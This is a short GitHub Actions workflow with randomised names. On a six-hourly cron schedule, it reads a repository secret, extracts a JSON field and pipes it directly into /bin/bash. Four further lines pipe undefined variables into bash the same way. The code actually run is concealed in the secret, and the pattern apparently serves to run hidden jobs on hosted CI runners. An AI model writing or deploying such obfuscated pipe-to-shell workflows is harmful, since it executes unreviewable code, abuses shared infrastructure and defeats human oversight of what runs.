name: chenseqing6751
on:
  workflow_dispatch:
  schedule:
    - cron: '26 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenseqing6751
        env:
          dmkik1031: ${{ secrets.dmkik1031 }}
        run: |
          echo $dmkik1031 | jq -r .z0194 | /bin/bash
          echo $oq0 | jq -r .ewtuc5309 | /bin/bash
          echo $f96793 | jq -r .ua6 | /bin/bash
          echo $ndqev86 | jq -r .i1969 | /bin/bash
          echo $rek627 | jq -r .rrwa4 | /bin/bash

